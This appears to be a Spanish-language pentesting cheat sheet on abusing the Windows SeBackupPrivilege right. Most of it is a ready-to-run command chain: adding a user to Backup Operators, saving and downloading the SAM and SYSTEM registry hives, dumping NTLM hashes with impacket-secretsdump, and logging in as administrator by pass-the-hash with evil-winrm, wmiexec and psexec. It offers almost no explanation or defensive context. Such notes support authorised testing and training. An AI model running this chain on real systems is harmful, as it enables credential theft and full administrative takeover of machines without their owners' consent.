⚪ SeBackupPrivilege

Información

El grupo/privilegio SeBackupPrivilege otorga a los usuarios capacidad de realizar copias en un contexto privilegiado.
(Para abusar de SeBackupPrivilege, podemos realizar un volcado de la SAM y obtener el hash del usuario administrator)

Identificar Privilegios

Agregar Usuario Grupo

Añadir al usuario j.wilson al grupo BackupOperators.

net localgroup "Backup Operators" j.wilson /add

Verificar Privilegios Usuario

Con el comando whoami /priv podemos verificar que el usuario j.wilson forma parte del grupo SeBackupPrivilege.

whoami /priv

Copia SAM/SYSTEM

Al disponer de privilegios altos para realizar copias, hago una copia del archivo SAM y SYSTEM.

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
download sam
download system

Hash Dump

Con impacket-secretsdump extraemos los hashes NTLM (NT) de los archivos SAM y SYSTEM.

impacket-secretsdump -system system -sam sam LOCAL

PassTheHash (PtH)

WINRM
evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'
SMB
wmiexec
impacket-wmiexec WORKGROUP/administrator@192.168.1.58 -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c'
psexec
impacket-psexec -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c' WORKGROUP/administrator@192.168.1.58 cmd.exe

© d4t4s3c 2025

results matching ""

    No results matching ""